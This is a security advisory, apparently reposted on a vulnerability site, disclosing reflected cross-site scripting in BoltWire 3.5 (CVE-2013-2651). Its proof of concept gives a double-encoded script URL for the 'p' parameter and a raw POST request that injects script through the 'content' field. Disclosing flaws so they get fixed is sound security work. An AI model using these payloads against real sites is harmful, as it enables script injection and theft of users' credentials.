BoltWire 3.5 Cross Site Scripting

2013.10.10
Credit: Manuel Garcia Cardenas
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2013-2651
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

============================================= INTERNET SECURITY AUDITORS ALERT 2013-010 - Original release date: March 20th, 2013 - Last revised: March 25th, 2013 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) - CVE-ID: CVE-2013-2651 ============================================= I. VULNERABILITY ------------------------- Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5 II. BACKGROUND ------------------------- BoltWire is an easy to use web development engine with surprizing flexibility and power. It has the various strengths of a wiki, cms, database, search engine, and more, all rolled together into a software system of ground-breaking design. III. DESCRIPTION ------------------------- Has been detected a reflected XSS vulnerability in BoltWire <=3.5 , that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter "p" and "content" in the page index.php. IV. PROOF OF CONCEPT ------------------------- The application does not validate the double encoding of the "p" parameter. Malicious Request ("p" parameter): Not vulnerable: http://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script> Not Vulnerable: http://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS %22%29%3c%2fscript%3e Vulnerable: http://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS %2522%2529%253c%252fscript%253e Malicious Request ("content" parameter): POST /bolt/field/index.php?p=action.create HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7; BOLTsession=bf1bcm8370oqt84lh8nvrdklb7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 121 target=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW> V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED ------------------------- All Versions of BoltWire <= v3.5 VII. SOLUTION ------------------------- All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated. VIII. REFERENCES ------------------------- http://www.boltwire.com http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Manuel Garca Crdenas (mgarcia (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------ March 20, 2013 1: Initial release XI. DISCLOSURE TIMELINE ------------------------- March 20, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com) March 25, 2013: Sent to Devel Team. October 09, 2013: After some months without feedback, we do a full-disclosure XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT ------------------------- Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us. XIV. FOLLOW US ------------------------- You can follow Internet Security Auditors, news and security advisories at: https://www.facebook.com/ISecAuditors https://twitter.com/ISecAuditors http://www.linkedin.com/company/internet-security-auditors http://www.youtube.com/user/ISecAuditors


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top